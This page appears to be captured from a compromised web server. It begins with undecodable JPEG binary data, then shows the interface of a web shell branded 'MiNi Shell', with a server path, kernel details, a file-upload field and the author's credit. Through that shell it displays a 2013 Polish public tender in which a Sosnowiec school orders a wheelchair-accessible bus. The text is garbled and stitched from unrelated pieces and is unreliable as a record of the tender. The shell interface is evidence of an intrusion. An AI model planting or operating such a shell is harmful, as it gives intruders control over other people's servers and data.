JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/423302-N-2013.html

<p class="kh_header"><b>Sosnowiec: Dostawa autobusu do przewozu 18 uczniów w tym:  2 uczniów na wózkach inwalidzkich + 1 kierowca</b><br>
<b>Numer ogłoszenia: 423302 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących Nr 5 , ul. Bohaterów Monte Cassino 46, 41-219 Sosnowiec, woj. śląskie, tel. 0-32 263 19 19, faks 0-32 263 19 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka samorządowa - szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa autobusu do przewozu 18 uczniów w tym:  2 uczniów na wózkach inwalidzkich + 1 kierowca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa autobusu, fabrycznie nowego rok produkcji 2013, do przewozu 18 uczniów w tym: 2 uczniów na wózkach inwalidzkich, po złożeniu ostatniego rzędu siedzeń w tyle autobusu  oraz 1 kierowcy. Pojazd musi być przystosowany do przewozu dzieci i młodzieży niepełnosprawnej. Wymagane jest, aby autobus posiadał homologację. 
	Opis techniczny.	
I.	Silnik:	
  1.	Wysokoprężny diesel 	
  2.	Moc od 100 KW 	
  3.	Norma spalania EU:  EEV/ EURO 5 	
  4. 	Duże przebiegi międzyobsługowe	
II.	Podwozie: 	
  1.	Zawieszenie komfortowe 	
III.	Układ kierowniczy:	
  1.	Wspomaganie układu kierowniczego	
IV.	Układ hamulcowy:	
  1.	ABS, ASR, EBV lub równoważne	
  2.	Wskaźnik zużycia klocków hamulcowych	
V.	Nadwozie:	
1.	Ilość miejsc pasażerskich : 18 miejsc z systemem mocowania fotelików dziecięcych  ISOFIX  z możliwością złożenia siedzeń dla 2 osób na wózkach inwalidzkich w tyle autobusu.	
2.	Kolor każdy z wyjątkiem białego i czarnego	
3.	Tapicerka welurowa	
4.	Wykładzina antypoślizgowa w części pasażerskiej	
5.	Oświetlenie przejścia oraz stopnia wejściowego	
6.	Dodatkowy stopień przy drzwiach przesuwnych	
7.	Mocowanie foteli na listwach, z możliwością demontażu i przesuwu foteli	
8.	Zasłonki na szyby	
9.	Fotel pasażera 2 osobowy odchylany, pasy trzypunktowe z możliwością blokady napięcia na wszystkich siedzeniach lub opcjonalnie pasy czteropunktowe	
10.	Fotel 1 osobowy odchylany, pasy trzypunktowe z możliwością blokady napięcia na wszystkich siedzeniach lub opcjonalnie pasy czteropunktowe	
11.	Fotel kierowcy z regulacją w 3 płaszczyznach, regulacją kąta poduszki siedzenia oraz regulacją podparcia odcinka lędźwiowego kręgosłupa i amortyzacją	
12.	Pojedynczy fotel pasażera obok kierowcy	
13.	2 stanowiska dla wózków inwalidzkich z atestowanymi uchwytami do    zamocowania każdego wózka w tyle autobusu	
14.	System mocowania osób na wózkach inwalidzkich posiadający atestowany komplet pasów zabezpieczających pasażerów w nich siedzących 	
15.	Uchwyty do mocowania tablic Przewóz dzieci, tylna podświetlona	
16.	Dodatkowa gaśnica		
17.	Mechaniczny szyberdach - wyjście awaryjne	
18.	System audio	
19.	Światła przeciwmgielne przednie	
20.	Światła dzienne	
21.	Ogranicznik prędkości do 100 km/h	
22.	Klimatyzacja półautomatyczna przednia 	
23.	Tachograf cyfrowy	
24.	Wygłuszenie hałasu pochodzącego od silnika i skrzyni biegów dodatkowe	
25.	Samonośne, wszystkie drzwi ocynkowane lub zabezpieczone przed korozją	
26.	Drzwi boczne przesuwne mechanicznie z prawej strony	
27.	Tylne drzwi przeszklone	
28.	Dodatkowe uchwyty przy drzwiach	
29.	Boczne listwy ochronne	
30.	Wszystkie szyby termoizolacyjne	
31.	Szyby w kabinie kierowcy sterowane elektrycznie	
32.	Lusterka zewnętrzne podgrzewane, regulowane mechanicznie 	
33.	Schowek w desce rozdzielczej	
34.	Półki nad przednią szybą	
35.	Koło zapasowe z koszem mocującym i zestawem narzędzi z podnośnikiem	
36. 	Lusterko wewnętrzne	
37.	Sterownik elektroniczny do ogrzewania	
38.	Ogrzewanie niezależne od silnika 	
39.	Dodatkowy system ogrzewania i wentylacji części pasażerskiej	
40.	Hak holowniczy	
41.	Czujniki cofania	
42.	Komplety opon letnich i zimowych	
43.	Winda dla wózków inwalidzkich w tyle autobusu, urządzenie musi posiadać homologacje na przewóz wózka wraz z osobą oraz dopuszczone do użytkowania przez UDT.	
44.	Dokumentacja badania  TEMPO 100	
VI.	Zabezpieczenie pojazdu: 	
  1.	Immobiliser	
  2.	Autoalarm	
  3.	Centralny zamek sterowany pilotem	
VII.	Gwarancja fabryczna	
  1.	Minimum 2 lata na podzespoły mechaniczne bez limitu przebiegu kilometrów	
  2.	Minimum 5 lat na powłokę lakierniczą	
  3.	Minimum 8 lat na perforację nadwozia	
  4.	Minimum 36 miesięcy okresu rękojmi za wady na wykonanie dostawy obejmujące dostawę autobusu.
Wszelkie zastosowane materiały i wyposażenie muszą posiadać odpowiednie certyfikaty, oraz spełniać normy i przepisy w przewozie osobowym i osób niepełnosprawnych	
VIII.	Wykonawca zobowiązany będzie dodatkowo:	
  1.	Dostarczyć dokumentację oprogramowania i instrukcje obsługi urządzeń zamontowanych w pojeździe	

IX.	Oferowany autobus:	
 1.	Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10.05.2011 roku w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu do niektórych rodzajów zamówień publicznych (Dz.U. 2011 nr 96 poz. 559) musi 
spełniać następujące parametry:	
	Autobus musi spełniać wymogi Dyrektywy CEE EURO5/2007/715/EC w zakresie emisji spalin oraz posiadać homologację	
Wielkość emisji dwutlenku węgla w jednostkach g/km zgodnie z normą EURO 5	Łączna wielkość emisji tlenku azotu, węglowodorów i cząstek stałych w jednostkach g/km zgodnie z normą EURO 5	
2.	Zużycie paliwa w tzw. cyklu miejskim nie więcej niż 11,01/100 km według 1999/100/EU	
3.	Średnie zużycie paliwa na 100 km	
		
Ponadto oferowany autobus musi:
a)	posiadać aktualne świadectwo homologacji wydane zgodnie z obowiązującymi przepisami prawa. 

b)	spełniać wymagania określone w Rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdu i ich wyposażenia (Dz. U. z 2013 r., poz. 951 z późn. zmianami).

Wszelkie zastosowane materiały muszą posiadać odpowiednie certyfikaty, oraz spełniać obowiązujące normy i przepisy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedłożyć:
a.	aktualny odpis z właściwego rejestru, jeżeli odrębne przypisy wymagają wpisu do rejestru    albo aktualne zaświadczenie o wpisie do centralnej ewidencji i informacji o działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b.	oświadczenie o spełnianiu warunków udziału w postępowaniu -załącznik nr 3 do siwz;
c.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, ze wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e.	oświadczenie Wykonawcy o przynależności do grupy kapitałowej -załącznik nr 4 do siwz;
f.	oświadczenie o braku podstaw do wykluczenia -załącznik nr 5 do siwz;
g.	oświadczenie o braku podstaw do wykluczenia dla osób fizycznych, prowadzących działalność na podstawie wpisu do centralnej ewidencji i informacji o działalności gospodarczej w zakresie art. 24 ust. 1 pkt. 2 ustawy - załącznik nr 6 do siwz;
Ww. dokumenty winny być złożone w formie oryginału lub kopii poświadczonej  za zgodność z oryginałem przez wykonawcę.
Ocena spełnienia powyższych warunków będzie dokonywana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedłożyć:
a.	wykaz dostaw  minimum 3 w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich  wartości nie mniejszej niż 150.000,00 zł, przedmiotu zamówienia odpowiadającego swoim rodzajem, dat wykonania i odbiorców oraz załączeniem dokumentów  potwierdzających referencje, że dostawy te zostały wykonane należycie - załącznik nr 7 do siwz; 
Ocena spełnienia powyższego warunku będzie dokonywana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedłożyć:
a.	polisę lub inny dokument ubezpieczenia Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Ocena spełnienia powyższego warunku będzie dokonywana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Specyfikacja techniczna pojazdu zawierająca dane techniczne potwierdzające spełnienie wymaganych przez zamawiającego parametrów technicznych - załącznik nr 2 do siwz.
2.	Podstawowa instrukcja użytkowania autobusu i windy w języku polskim.
3.	Homologacje: na pojazd bazowy, na zabudowę , na przystosowanie do przewozu osób niepełnosprawnych w tym osób w wózkach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - średnia wielkość zużycia paliwa na 100 km w ruchu miejskim - 15</li>
<li>3 - wielkość emisji dwutlenku węgla w jednostkach g/km - 2.5</li>
<li>4 - wielkość emisji zanieczyszczeń: tlenku azotu, cząstek stałych oraz węglowodorów w jednostkach g/km - 2.5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ogólnokształcących nr 5 w Sosnowcu 41 - 219 ul. Bohaterów Monte Cassino 46.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 10:00, miejsce: Zespół Szkół Ogólnokształcących nr 5 w Sosnowcu 41 - 219 ul. Bohaterów Monte Cassino 46 sekretariat szkoły pok.nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w części finansowany w ramach Programu wyrównywania różnic między regionami II w obszarach D, G..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com